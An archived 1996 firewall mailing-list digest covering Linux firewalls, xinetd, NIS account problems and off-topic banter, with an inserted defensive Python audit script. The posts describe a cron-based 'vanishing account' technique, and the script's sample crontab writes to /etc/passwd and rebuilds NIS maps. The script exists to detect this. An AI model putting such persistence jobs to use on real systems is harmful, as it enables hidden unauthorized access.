> true multi-tasking operating system, so it shouldn't be used as a
> firewall. What's the true story here? Ideally, in our situation, the
> bastion host would be the firewall, the WWW server, the ftp server, the
> Usenet news server, etc... Is this completely unrealistic?
>

Again, I don't know all.... I like LINUX, and I feel that it is a true multi-tasking OS. But I'm not a CS genius.
I personally object to using it as part of an Internet firewall simply because of this: think of the unknown multitudes of people out there who have entirely too much time on their hands (like me) who have the source code of this OS and can spend all kinds of time hacking and re-hacking our own boxes. I don't feel that LINUX is a good choice for a firewall. Do you have any idea how many hacks there are for LINUX? There may be as many holes for Solaris or IRIX, but that stuff isn't free. LINUX is.

My 25 cents worth.

______________________________________________________________________________
______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______
Voice: 1.800.835.6100    E-mail: support@colorprinters.tek.com    Fax: 1.503.685.3063
WWW: www.tek.com    BBS: 1.503.685.4504    E-World: Keyword Tektronix
HAL: 1.503.682.7450    AOL: Keyword Tektronix    Service: 1.800.835.6100    FTP: ftp.tek.com
______________________________________________________________________________

From firewalls-owner Mon Jan 15 12:40:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA21909 for firewalls-outgoing; Mon, 15 Jan 1996 12:23:41 -0800 (PST)
Received: from directors.rdl.co.uk (directors.rdl.co.uk [193.119.77.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA21903 for ; Mon, 15 Jan 1996 12:23:36 -0800 (PST)
Received: (from andy@localhost) by directors.rdl.co.uk (8.7.3/8.7.3) id UAA27001; Mon, 15 Jan 1996 20:22:35 GMT
Date: Mon, 15 Jan 1996 20:22:35 GMT
Message-Id: <199601152022.UAA27001@directors.rdl.co.uk>
From: "Andy Gay (3272)"
To: firewalls@GreatCircle.com
CC: andy@directors.rdl.co.uk
Subject: xinetd on the firewall host
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I know the usual advice is to disable as much inetd stuff as possible on the firewall host, but it'd be handy to have telnet, rlogin, ftp etc available sometimes. I'd like to think that could be done safely using xinetd to control access.
Is this a common approach? I've not seen much discussion of xinetd here - perhaps this isn't the place, but I wonder if anyone has any concerns about its security.

Also, does anyone know if a Solaris 2 port has been done?

--
Andy

From firewalls-owner Mon Jan 15 12:41:33 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA19438 for firewalls-outgoing; Mon, 15 Jan 1996 11:15:33 -0800 (PST)
Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA19424 for ; Mon, 15 Jan 1996 11:15:28 -0800 (PST)
Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id OAA29783; Mon, 15 Jan 1996 14:13:09 -0500
Date: Mon, 15 Jan 1996 14:13:09 -0500 (EST)
From: Brain21
To: Berry Kercheval
cc: firewalls@GreatCircle.COM, kerch@parc.xerox.com
Subject: Re: "Q" Clearance
In-Reply-To: <96Jan13.105836pst.34953@reynaldo.parc.xerox.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sat, 13 Jan 1996, Berry Kercheval wrote:

> It's really not that hard. Top Secret is a Department of Defense clearance
> level. "Q" is a Department of Energy clearance level.

This all strikes me as odd. When my father did work for that sub-contractor (I *know* that it was for the DoD, and not the DoE, although he *may* have done work for them as well, but I don't ever recall him mentioning DoE), he had what he called "Q" clearance. This was before I knew that there were different clearance "names" for different agencies (I figured that the names were universal across all departments, but were exclusive to that department). When he left that company he went to work somewhere else.
These people told him that his "Q" clearance simply was not good enough for the work that he was going to be doing, and he had to wait for clearance before he knew if he got the job (there were other factors involved as well, but this is the important one). I say it is odd, because prior to his changing jobs I had only heard of DoD terms, and I *had* heard of "Q" clearance. Is there not, perhaps, something in the DoD that is similar in pronunciation? I'll have to call and ask him.

> > The DoD controls all the military in the US. The DoE controls research,

Well, these two, and other agencies *do* have duties that overlap, but that goes w/o saying.

Brain21

From firewalls-owner Mon Jan 15 13:06:52 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA22281 for firewalls-outgoing; Mon, 15 Jan 1996 12:29:12 -0800 (PST)
Received: from renoir.cftnet.com (renoir.cftnet.com [163.125.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA22276 for ; Mon, 15 Jan 1996 12:29:07 -0800 (PST)
Received: from mail.jabil.com (mail.jabil.com [163.125.33.5]) by renoir.cftnet.com (8.7.1/8.6.4) with SMTP id PAA22529; Mon, 15 Jan 1996 15:25:32 -0500 (EST)
Received: from smtplink.jabil.com by mail.jabil.com id aa25191; 15 Jan 96 15:21 EST
Received: from cc:Mail SMTPLINK 2.1 by jabil.com id AA821748176; Mon, 15 Jan 96 15:19:15 EST
Date: Mon, 15 Jan 96 15:19:15 EST
From: Kyle Amon
Message-Id: <9600158217.AA821748176@jabil.com>
To: Firewalls@greatcircle.com, Carolina Elortegui
Subject: Re: SunOS, NIS and some intruder
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

It's unlikely, but possible, that the user has created a "vanishing account" with judicious use of the cron facilities. The account could appear and disappear at predetermined intervals, making it somewhat harder to detect.

Just an idea,

Kyle Amon
System Administrator
kyle_amon@jabil.com
Jabil Circuit, Inc.
______________________________ Reply Separator _________________________________
Subject: SunOS, NIS and some intruder
Author: Carolina Elortegui at Smtplink_South
Date: 1/10/96 7:56 AM

I just want some help understanding something that happened here on Friday. I'm the sysadmin in a lab with 4 HP and 2 Suns. I have worked a lot with the HP, but almost never with the Suns, because there was another person that did it. This person left the lab, and now I have to learn about SunOS and BSD-like UNIX.

There is a NIS server, let's call it "A", and there is a NIS client, let's call it "B". On Thursday I deleted a user from both systems, because we don't want him to access our net. On Friday I found that the "user" I deleted the day before accessed "B", and he has no login in the /etc/passwd, /etc/group, etc. I was looking with the last command at what happened, and I saw that the user accessed machine "B" plenty of times that day.

I am really new in sysadmin labors on the Sun machines; I really know HP-UX. Maybe there is something I don't know about happening with the NIS service and the Yellow Pages service. I have to tell you that the person that was here before me just left the Suns as they were. I don't know what they did there; I am learning it right now.
Thanks for helping me
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Carolina Elortegui
Laboratorio de Postgrado
Universidad Central de Venezuela
Administrador
Facultad de Ciencias
Escuela de Computacion
E-mail: celort@kuma.ciens.ucv.ve
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From firewalls-owner Mon Jan 15 13:14:56 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA20561 for firewalls-outgoing; Mon, 15 Jan 1996 12:05:14 -0800 (PST)
Received: from sun4nl.NL.net (sun4nl.NL.net [193.78.240.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA20536 for ; Mon, 15 Jan 1996 12:05:07 -0800 (PST)
Received: from lvp by sun4nl.NL.net via EUnet id AA13665 (5.65b/CWI-3.3); Mon, 15 Jan 1996 21:04:06 +0100
Received: (from eddie@localhost) by lvp.lvp.nl (8.6.9/8.6.9) id UAA28392; Mon, 15 Jan 1996 20:21:01 +0100
Date: Mon, 15 Jan 1996 20:21:01 +0100
From: Eddie Penninkhof
Subject: Logging in into a firewall
To: Firewalls Mailinglist
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'd like users, who have dynamic IP addresses, to be able to access a host behind a firewall, after a username/password verification. Are there any standard protocols for logging in to a firewall? Are there any Linux implementations of those protocols?

CU, Eddie.
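For the SunOS/NIS thread above (Carolina Elortegui's question and Kyle Amon's "vanishing account" idea), here is an added audit script. It is editorial example code, not something either poster or the list supplied. It assumes SunOS-style passwd lines, ordinary crontab lines and `last` output, and every input below is constructed sample text. The NIS point it checks is that deleting a line from the master's /etc/passwd does not change what ypserv hands out until the maps under the NIS map directory are rebuilt, so a client with a "+" line keeps accepting the login; the cron check looks for jobs that touch account files or NIS maps, which is where a vanishing account would have to live.

```python
"""Added audit helpers for the SunOS/NIS thread above (editorial example, not
code from Carolina Elortegui, Kyle Amon or the list). All inputs are constructed
sample text in the formats of /etc/passwd, `ypcat passwd`, a crontab and `last`.
"""
from collections import Counter

# Constructed sample: the NIS master's /etc/passwd after the admin deleted "jdoe".
# The "+" line is the NIS escape that makes a client consult the served map.
LOCAL_PASSWD = """\
root:x:0:1:Operator:/:/bin/csh
daemon:x:1:1::/:
+::0:0:::
carol:x:201:20:Carolina:/home/carol:/bin/csh
"""

# Constructed sample `ypcat passwd` from client B: the passwd map was never
# rebuilt after the edit, so the map still carries the deleted login.
YPCAT_PASSWD = """\
carol:x:201:20:Carolina:/home/carol:/bin/csh
jdoe:x:202:20:J. Doe:/home/jdoe:/bin/csh
"""

# Constructed sample crontab: a normal job, a job that re-inserts an account and
# rebuilds the NIS maps at night, and one that removes it again at dawn
# (the "vanishing account" pattern Kyle Amon describes).
CRONTAB = """\
0 2 * * * /usr/lib/find/updatedb
30 23 * * * cat /var/tmp/.x >> /etc/passwd; cd /var/yp && make
0 6 * * * grep -v '^jdoe:' /etc/passwd > /tmp/p && mv /tmp/p /etc/passwd
"""

# Constructed sample `last` output from machine B.
LAST_OUTPUT = """\
jdoe      ttyp2    host1.example.org  Fri Jan 12 23:41 - 23:58  (00:17)
jdoe      ttyp1    host1.example.org  Fri Jan 12 23:35 - 23:40  (00:05)
carol     ttyp0    host2.example.org  Fri Jan 12 09:02 - 17:30  (08:28)
reboot    ~                           Thu Jan 11 07:00
"""


def parse_passwd(text):
    """Map login -> uid from passwd-format lines, skipping comments and NIS +/- escapes."""
    accounts = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#+-":
            continue
        fields = line.split(":")
        if len(fields) >= 3:
            accounts[fields[0]] = int(fields[2])
    return accounts


def stale_map_entries(local_passwd, ypcat_output):
    """Logins the NIS map still serves although they are gone from the master file.
    ypserv answers from the compiled map, which changes only when the maps are
    rebuilt, so a bare edit of /etc/passwd leaves the old login valid on clients."""
    return sorted(set(parse_passwd(ypcat_output)) - set(parse_passwd(local_passwd)))


ACCOUNT_MARKERS = ("/etc/passwd", "/etc/group", "/etc/shadow", "/var/yp", "ypmake")


def suspicious_cron_entries(crontab_text):
    """(schedule, command) pairs for cron jobs whose command touches account files or NIS maps."""
    hits = []
    for line in crontab_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        parts = line.split(None, 5)            # minute hour day month weekday command
        if len(parts) < 6:
            continue
        schedule, command = " ".join(parts[:5]), parts[5]
        if any(marker in command for marker in ACCOUNT_MARKERS):
            hits.append((schedule, command))
    return hits


def sessions_by_unknown_logins(last_output, local_passwd):
    """Count `last` sessions for logins that have no entry in the local passwd file."""
    known = parse_passwd(local_passwd)
    counts = Counter()
    for line in last_output.splitlines():
        fields = line.split()
        if not fields or fields[0] in ("reboot", "shutdown", "wtmp"):
            continue
        if fields[0] not in known:
            counts[fields[0]] += 1
    return dict(counts)


if __name__ == "__main__":
    print("served by NIS but absent locally:", stale_map_entries(LOCAL_PASSWD, YPCAT_PASSWD))
    for schedule, command in suspicious_cron_entries(CRONTAB):
        print("cron job touching account data:", schedule, "->", command)
    print("sessions by unknown logins:", sessions_by_unknown_logins(LAST_OUTPUT, LOCAL_PASSWD))
```

On a real host the three inputs would come from the master's /etc/passwd, `ypcat passwd` run on the client, and the crontab and `last` output of the machine the logins were seen on; the three functions then point at whichever of the two explanations (stale map or scheduled re-creation) fits.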
From firewalls-owner Mon Jan 15 13:40:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA26154 for firewalls-outgoing; Mon, 15 Jan 1996 13:34:42 -0800 (PST)
Received: from netsys.com (netsys.com [198.175.9.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA26149 for ; Mon, 15 Jan 1996 13:34:38 -0800 (PST)
Received: (from len@localhost) by netsys.com (8.6.11/NETSYS-LEN) id NAA01752 for firewalls@greatcircle.com; Mon, 15 Jan 1996 13:33:15 -0800
X-Phone: 415-385-1085
X-Mailer: Z-Mail (3.2.0 06sep94)
Received: (from len@localhost) by netsys.com (8.6.11/NETSYS-LEN) id NAA01736; Mon, 15 Jan 1996 13:31:15 -0800
From: "Len Rose"
Message-Id: <9601151331.ZM1734@netsys.com>
Date: Mon, 15 Jan 1996 13:31:14 -0800
In-Reply-To: Scott Barman "Re: The Last Mitnick Post/Thread" (Jan 15, 12:57pm)
References:
X-Phone: 415-385-1085
X-Mailer: Z-Mail (3.2.0 06sep94)
To: Scott Barman
Subject: Re: The Last Mitnick Post/Thread
Cc: firewalls@netsys.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Markoff and Tsutomu acted reprehensibly by quoting sniffer sessions with Kevin and jsz in which my site was mentioned. Not only were the facts wrong, as jsz never had my firewall router passwords, jsz never knew that much about Cisco routers in general.

I am extremely annoyed that when they did explain who/what netsys.com/Len Rose is, they only bothered to mention the past and not what I have achieved since 1992. No one from their ghost writing teams ever contacted me to get the facts either.

If the government is interested in talking to jsz as has been rumored then they should go ahead, and if not, then perhaps someone could clear jsz's name, which seems to be pretty muddied by the somewhat irresponsible literary excesses which seem to fill the Tsutomu/Markoff book.
Firewalls isn't really the appropriate platform for this sort of discussion, and I apologize for continuing this thread :-)

Regards,

Len

On Jan 15, 12:57pm, Scott Barman wrote:
> Subject: Re: The Last Mitnick Post/Thread
> On Mon, 15 Jan 1996 Mark_W_Loveless@smtp.bnr.com wrote:
>
> > Most everyone is speculating on things we know nothing about. I can
> > only assume hackers hope we spend all our time talking about them and
> > not looking for them on our systems.
> >
> > The definitive book on Mitnick is The Fugitive Game by Jonathan
> > Littman. A lot of it is Mitnick's own words. Well written, much better
> > than Markoff's "hype"rspace writings.
>
> Dateline (on NBC) had a report of Shimomura's side of the story last
> Friday. I don't know if they put anything about it on their web site
> but you can try www.nbc.com. One of the reasons for this was to hype
> the book by Shimomura and the writer of the New York Times articles
> that followed.
>
> Please don't ask me about the book (I can't even remember the title).
> All I remember were the authors and that it was released last week.
>
> scott barman
> --
> scott barman             DISCLAIMER: I speak to anyone who will listen,
> scott@disclosure.com     and I speak only for myself.
> barman@ix.netcom.com
> "Micro$oft and Windoze/NT will be the cause of the de-evolution of
> network security just as the original PC and BASIC was the cause of
> the de-evolution of programming."
>                                                  - scott barman
>
>-- End of excerpt from Scott Barman

--
len@netsys.com http://www.netsys.com

From firewalls-owner Mon Jan 15 14:10:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA27013 for firewalls-outgoing; Mon, 15 Jan 1996 13:49:11 -0800 (PST)
Received: from border.dreamworks.com (dreamworks.com [204.250.57.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA27001 for ; Mon, 15 Jan 1996 13:49:05 -0800 (PST)
Received: from border.dreamworks.com (daemon@localhost) by border.dreamworks.com (8.6.12/8.6.12) with ESMTP id NAA25913 for ; Mon, 15 Jan 1996 13:34:25 -0800
Received: from gateway (gateway.dreamworks.com [10.1.1.2]) by border.dreamworks.com (8.6.12/8.6.12) with ESMTP id NAA25907 for ; Mon, 15 Jan 1996 13:34:25 -0800
Received: from juice.dreamworks.com by gateway (SMI-8.6/SMI-SVR4) id NAA17570; Mon, 15 Jan 1996 13:47:51 -0800
Received: by juice.dreamworks.com (940816.SGI.8.6.9/940406.SGI.AUTO) id NAA17170; Mon, 15 Jan 1996 13:51:06 -0800
From: "Alan C.Horn"
Message-Id: <9601151351.ZM17168@juice.dreamworks.com>
Date: Mon, 15 Jan 1996 13:51:04 -0800
In-Reply-To: Brain21 "Re: "Q" Clearance" (Jan 15, 2:13pm)
References:
X-Mailer: Z-Mail (3.2.2 10apr95 MediaMail)
To: Brain21
Subject: Re: "Q" Clearance
Cc: firewalls@GreatCircle.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Quite frankly guys, who cares about Ministry of Silly Walks security clearance... Can we get back to firewalls please ?
Thanks

Al

From firewalls-owner Mon Jan 15 14:55:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA29764 for firewalls-outgoing; Mon, 15 Jan 1996 14:36:07 -0800 (PST)
Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA29757 for ; Mon, 15 Jan 1996 14:36:00 -0800 (PST)
Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id QAA23226 for GreatCircle.COM!Firewalls; Mon, 15 Jan 1996 16:14:41 -0600 (CST)
Received: by ris1.nmti.com (smail2.5) id AA12857; 15 Jan 96 16:16:05 CST (Mon)
Received: by sonic.nmti.com; id AA00346; Mon, 15 Jan 1996 15:44:30 -0600
From: peter@nmti.com (Peter da Silva)
Message-Id: <9601152144.AA00346@sonic.nmti.com.nmti.com>
Subject: Re: "Title for Firewall Admin?
To: brain21@montag33.residence.gatech.edu (Brain21)
Date: Mon, 15 Jan 1996 15:44:30 -0600 (CST)
Cc: shawn@aob.org, Firewalls@GreatCircle.COM
In-Reply-To: from "Brain21" at Jan 15, 96 12:53:01 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I think "Gatekeeper" is definitely the most practical one, for a "required" "standard" email address.
From firewalls-owner Mon Jan 15 15:12:38 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA01553 for firewalls-outgoing; Mon, 15 Jan 1996 15:08:58 -0800 (PST)
Received: from renoir.cftnet.com (renoir.cftnet.com [163.125.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA01548 for ; Mon, 15 Jan 1996 15:08:54 -0800 (PST)
Received: from mail.jabil.com (mail.jabil.com [163.125.33.5]) by renoir.cftnet.com (8.7.1/8.6.4) with SMTP id SAA14745; Mon, 15 Jan 1996 18:10:31 -0500 (EST)
Received: from smtplink.jabil.com by mail.jabil.com id aa26726; 15 Jan 96 18:06 EST
Received: from cc:Mail SMTPLINK 2.1 by jabil.com id AA821758074; Mon, 15 Jan 96 17:31:21 EST
Date: Mon, 15 Jan 96 17:31:21 EST
From: Kyle Amon
Message-Id: <9600158217.AA821758074@jabil.com>
To: shawn@aob.org, Brain21
Cc: Firewalls@greatcircle.com
Subject: Re[2]: "Title for Firewall Admin?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I still like "gatekeeper". My $0.02.

Kyle Amon
System Administrator
kyle_amon@jabil.com
Jabil Circuit, Inc.

______________________________ Reply Separator _________________________________
Subject: Re: "Title for Firewall Admin?
Author: Brain21 at Smtplink_South
Date: 1/15/96 4:08 PM

On Fri, 12 Jan 1996, Shawn Steele wrote:

> > The mail administrator is "postmaster"
> > The web server admin is "webmaster"
> > Is there such a title for a firewall administrator?
> > Firemaster?
> How about Firemarshall-Bill?

Or just plain Firemarshall?
Brain21

From firewalls-owner Mon Jan 15 15:25:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA29593 for firewalls-outgoing; Mon, 15 Jan 1996 14:31:57 -0800 (PST)
Received: from bastion.sware.com (bastion.sware.com [139.131.15.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA29587 for ; Mon, 15 Jan 1996 14:31:52 -0800 (PST)
Received: from shlep.sware.com (shlep.sware.com [139.131.1.14]) by bastion.sware.com (8.6.12/8.6.5) with SMTP id RAA03049; Mon, 15 Jan 1996 17:30:12 -0500
Received: by shlep.sware.com (5.65/2.0) from guinan.sware.com id AA24477; Mon, 15 Jan 96 17:26:09 -0500
Received: by guinan.sware.com (AIX 3.2/UCB 5.64/2.1) from localhost id AA27516; Mon, 15 Jan 1996 17:22:48 -0500
Message-Id: <9601152222.AA27516@guinan.sware.com>
From: Shan Bell
X-Mailer: SecureMail [2.3.1]
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Cc: Ken Hays, Dave Kennedy, Shawn Steele, Firewalls@GreatCircle.COM
To: Brain21
Subject: Re: "Title for Firewall Admin?
In-Reply-To: Your message of Mon, 15 Jan 1996 13:01:31 -0500 (EST).
Date: Mon, 15 Jan 96 17:22:48 EST
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Brain21 writes:
> On Fri, 12 Jan 1996, Ken Hays wrote:
>
> > >Remember "Ghostbusters?" There was the gatekeeper and the keymaster.
> >
> > I would suggest that keymaster be reserved for the Kerberos administrator.
> >
> I think Gozer was the keymaster, does anyone remember the Gatekeepers
> name?
>
> Brain21
>

Zuul was the Gatekeeper. The Keymaster's name sounded like "Vince Klaartu" to me. Gozer was the god(dess?) behind it all.

Shannon Bell
Email: shan.bell@sware.com - Voice: +1 404 321 6597 x163 - Fax: +1 404 315 0293
SecureWare, Inc.
/ 2957 Clairmont Rd Suite 200 / Atlanta GA 30329-1647
GCS -d+@ H>++ s+:- g+ p?>!p !au>* a- w+ v- C++$ U[BLUAVHSCX]++++$ P+ L+>+++ 3>+++ E- !N>N++ K W M+ V- -po+ Y+ t+>+(+++) 5+ j R(+) G'('') tv+ b+++ !D B-- e++ u** h--- f+ r+++ n-- y+++

From firewalls-owner Mon Jan 15 15:40:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA29680 for firewalls-outgoing; Mon, 15 Jan 1996 14:34:10 -0800 (PST)
Received: from renoir.cftnet.com (renoir.cftnet.com [163.125.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA29663 for ; Mon, 15 Jan 1996 14:34:02 -0800 (PST)
Received: from mail.jabil.com (mail.jabil.com [163.125.33.5]) by renoir.cftnet.com (8.7.1/8.6.4) with SMTP id RAA10715; Mon, 15 Jan 1996 17:35:38 -0500 (EST)
Received: from smtplink.jabil.com by mail.jabil.com id aa26487; 15 Jan 96 17:31 EST
Received: from cc:Mail SMTPLINK 2.1 by jabil.com id AA821755980; Mon, 15 Jan 96 17:27:34 EST
Date: Mon, 15 Jan 96 17:27:34 EST
From: Kyle Amon
Message-Id: <9600158217.AA821755980@jabil.com>
To: Firewalls@greatcircle.com, Eric Wieling
Subject: Re: TCP and UDP relay software.
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Check out something called Netcat by . It's a pretty flexible little tool that I believe will do your bidding.

Kyle Amon
System Administrator
kyle_amon@jabil.com
Jabil Circuit, Inc.

______________________________ Reply Separator _________________________________
Subject: TCP and UDP relay software.
Author: Eric Wieling at Smtplink_South
Date: 1/14/96 7:34 PM

Our network is divided into several segments, none of which are considered "trusted". I am looking for a daemon that I can run on the firewall that can take incoming TCP connections or UDP datagrams and forward them to a prespecified host. Mostly I want users on several of the segments to be able to telnet to some port, and have the connection relayed to an outside service such as Lexis/Nexis, or WestLaw.
I have searched high and low and simply cannot find such software. I understand that the application for this is rather limited. People tend to want to be able to telnet to any host they want. I could use some SOCKS aware telnet program I suppose, but there don't seem to be many SOCKS aware telnet clients for MS-Windows.

Regards,
Eric
--
Eric Wieling
Network Operations Center
Inter Commerce Corporation

From firewalls-owner Mon Jan 15 15:51:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA29681 for firewalls-outgoing; Mon, 15 Jan 1996 14:34:12 -0800 (PST)
Received: from renoir.cftnet.com (renoir.cftnet.com [163.125.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA29664 for ; Mon, 15 Jan 1996 14:34:02 -0800 (PST)
Received: from mail.jabil.com (mail.jabil.com [163.125.33.5]) by renoir.cftnet.com (8.7.1/8.6.4) with SMTP id RAA10693; Mon, 15 Jan 1996 17:35:32 -0500 (EST)
Received: from smtplink.jabil.com by mail.jabil.com id aa26477; 15 Jan 96 17:31 EST
Received: from cc:Mail SMTPLINK 2.1 by jabil.com id AA821755975; Mon, 15 Jan 96 17:00:14 EST
Date: Mon, 15 Jan 96 17:00:14 EST
From: Kyle Amon
Message-Id: <9600158217.AA821755975@jabil.com>
To: dana@nav.cc.tx.us, Phil Howard
Cc: firewalls@greatcircle.com
Subject: Re[2]: Linux as a firewall
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Check out the January '96 issue of Sys Admin for a pretty good article on Linux as a firewall. Actually, the issue's main focus is on Linux.

Kyle Amon
System Administrator
kyle_amon@jabil.com
Jabil Circuit, Inc.

______________________________ Reply Separator _________________________________
Subject: Re: Linux as a firewall
Author: Phil Howard at Smtplink_South
Date: 1/12/96 9:33 PM

Dana Brewer writes...

> I've noticed that a lot of people say they use Linux as part of their
> Internet firewall. But now I've had a company tell me that Linux isn't a
> true multi-tasking operating system, so it shouldn't be used as a
> firewall. What's the true story here? Ideally, in our situation, the
> bastion host would be the firewall, the WWW server, the ftp server, the
> Usenet news server, etc... Is this completely unrealistic?

Anyone that says Linux is not a true multi-tasking system should not be believed in anything they say. Wanna bet it was a salesman that would profit from your decision to purchase his product instead of rolling your own? I would not even consider whatever product that company sells, now, unless it was just the "opinion" of a particular salesman, in which case if you do decide to buy their product(s), I would find someone else to make the sale with.

Anyone that says they don't know if Linux is a true multi-tasking system or not can only be accused of not knowing about Linux. But anyone who is knowledgeable about systems and has examined Linux can only conclude that it is real. IMHO: it's more real than just about anything else out there.

What you should be asking is if Linux can be used to solve your Internet security problems. I cannot answer that. Linux can be used to solve some people's problems. But it isn't everything to everyone. There is not an 800 number to call and have a technician fly out that night to come fix your system after it burns itself down. Some manager types that wear ties all day feel all comfy when there is a Tech "Support" line to call. Me, personally, I don't, because I'm the one that has had to call those lines, and stay on hold, and get transferred around, put up with the multi-level menus that don't have anything about my problem, and then get some bozo that can only barely tell you what the next version number is that you need to wait for. I've had SOME of these kinds of problems with the tech "support" line of every company I've ever had to call such numbers from.

But then, I'm a technical person, and I know what to do to fix things myself, only if I have the resources to do it with (e.g. original source code that was reasonably written and compilable). In many cases I had to call the 800 number because that is what I was supposed to do, but I ended up giving them the solution. But not everyone fits in that category.

You have to make the decision yourself about what is appropriate for you. I can reassure you that many people do use Linux for firewalls and are very happy with it. I don't at my day job, but that was what was decided by people higher up before they even knew of Linux.

With Linux, you will have to do a lot more yourself. I suggest you get a copy and install it, run it, and play around with it, and see if you feel comfortable with it. You're sure to run into some problems. Try to fix them with the help of people on the comp.os.linux.* newsgroups and see if that works for you. If it does, then give it a shot as a firewall. If not, try something else. Or if it is feasible, try more than one at a time.

Good luck.

--
Phil Howard KA9WGN    +-------------------------------------------------+
Linux Consultant      | The enemy of my enemy is NOT my friend...       |
Milepost Services     | ...but he is a convenient ally!                 |
phil@milepost.com     +-------------------------------------------------+

From firewalls-owner Mon Jan 15 19:10:51 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA12129 for firewalls-outgoing; Mon, 15 Jan 1996 18:58:51 -0800 (PST)
Received: from myall.awadi.com.au (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id SAA12124 for ; Mon, 15 Jan 1996 18:58:42 -0800 (PST)
Received: from bunya.awadi ([150.207.2.63]) by myall.awadi.com.au (8.7.1/8.7.1) with SMTP id NAA26297; Tue, 16 Jan 1996 13:27:44 +1030 (CST)
Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA20494; Tue, 16 Jan 1996 13:27:21 +1030
From: blymn@awadi.com.au (Brett Lymn)
Message-Id: <9601160257.AA20494@bunya.awadi>
Subject: Re: "Title for Firewall Admin?
To: shan.bell@sware.com (Shan Bell)
Date: Tue, 16 Jan 1996 13:27:21 +1030 (CST)
Cc: firewalls@greatcircle.com
In-Reply-To: <9601152222.AA27516@guinan.sware.com> from "Shan Bell" at Jan 15, 96 05:22:48 pm
X-Mailer: ELM [version 2.4 PL2]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

According to Shan Bell:
>
>Zuul was the Gatekeeper. The Keymaster's name sounded like "Vince
>Klaartu" to me. Gozer was the god(dess?) behind it all.
>

Cannot remember the names but this thread does bring to mind one of my favourite lines:

"Do you want the body of this mortal?"
"Is this a trick question?"
(Bill Murray...)

though I did like "OK.... so... she's a dog"

--
Brett Lymn, Computer Systems Administrator, AWA Defence Industries
===============================================================================
"Upgrading your memory gives you MORE RAM!" - ad in MacWAREHOUSE catalogue.
From firewalls-owner Mon Jan 15 19:40:51 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA13787 for firewalls-outgoing; Mon, 15 Jan 1996 19:35:22 -0800 (PST)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id TAA13773 for ; Mon, 15 Jan 1996 19:35:16 -0800 (PST)
Message-Id: <199601160335.TAA13773@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA067592951; Tue, 16 Jan 1996 14:29:11 +1100
From: Darren Reed
